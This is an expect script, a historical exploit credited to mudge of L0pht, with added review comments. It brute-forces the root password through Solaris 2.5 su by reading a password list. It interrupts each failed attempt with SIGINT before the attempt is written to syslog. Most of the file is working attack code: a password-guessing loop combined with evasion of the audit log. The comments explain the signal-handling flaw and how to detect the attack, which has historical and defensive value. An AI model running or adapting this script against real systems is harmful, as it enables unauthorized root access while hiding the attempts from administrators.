#!/usr/local/bin/expect --

# A quick little sploit for a quick round of beers :) mudge@L0pht.com
#
# This was something that had been floating around for some time.
# It might have been bitwrior that pointed out some of the oddities
# but I don't remember.
#
# It was mentioned to Casper Dik at some point and it was fixed in
# the next rev of Solaris (don't remember if the fix took place in
# 2.5.1 or 2.6 - I know it is in 2.6 at least).
#
# What happened was that the Solaris 2.5 and below systems
# had /bin/su written in the following fashion :
#
#         attempt to SU
#               |
#           successful
#             /   \
#            Y     N
#            |     |
#        exec cmd  sleep
#                    |
#                  syslog
#                    |
#                   exit
#
# There were a few problems here - not the least of which was that they
# did not bother to trap signals. Thus, if you noticed su taking a while
# you most likely entered an incorrect password and were in the
# sleep phase.
#
# Sending a SIGINT by hitting ctrl-c would kill the process
# before the syslog of the invalid attempt occurred.
#
# In current versions of /bin/su they DO trap signals.
#
# It should be noted that this is a fairly common coding problem that
# people will find in a lot of "security related" programs.
#
# .mudge
#
# NOTE(review): historical proof-of-concept for the su behaviour described
# above (Solaris 2.5 and below, per the header). The underlying defect is
# an ordering/atomicity bug in the audit path: the failed attempt is
# written to syslog only *after* the penalty sleep, and SIGINT is neither
# ignored nor blocked during that sleep, so the attempt can be terminated
# before it is ever recorded. The defensive lesson is to record the
# security event before (or atomically with) any delay, and to ignore or
# block interrupting signals for the duration of a penalty delay. On a
# fixed su (2.6 and later, per the header) every attempt this loop makes
# is logged regardless of the SIGINT, so a burst of su failures in the
# auth log is the expected detection signal.


# Usage check: exactly one argument (the password-list file) is required.
# Note that this exits with status 0 even on a usage error.
if { ($argc < 1) || ($argc > 1) } {
puts "correct usage is : $argv0 pwfile"
exit
}

# $argv is a Tcl list; with exactly one element (checked above) it
# collapses to the bare filename. The channel is never closed, which is
# harmless for a run-once script but would be a leak in longer-lived code.
set pwfile [open $argv "r"]

# Stop expect from echoing the spawned program's output to stdout.
log_user 0
# The whole file is read at once and split on newline; a trailing
# newline therefore yields a final empty element.
foreach line [split [read $pwfile] "\n"] {
spawn su root
expect "Password:"
send "$line\n"
# you might need to tweak this but it should be ok
set timeout 2
# Only the success pattern is handled here; when it does not appear
# within the timeout (the failure case) control simply falls through.
expect {
"#" { puts "root password is $line\n" ; exit }
}
# Interrupt the su process while it is still in its sleep phase, i.e.
# before the syslog call in the flow above. This is exactly the step a
# signal-trapping su defeats.
set id [ exp_pid ]
exec kill -INT $id
}
# www.hack.co.za [2000]#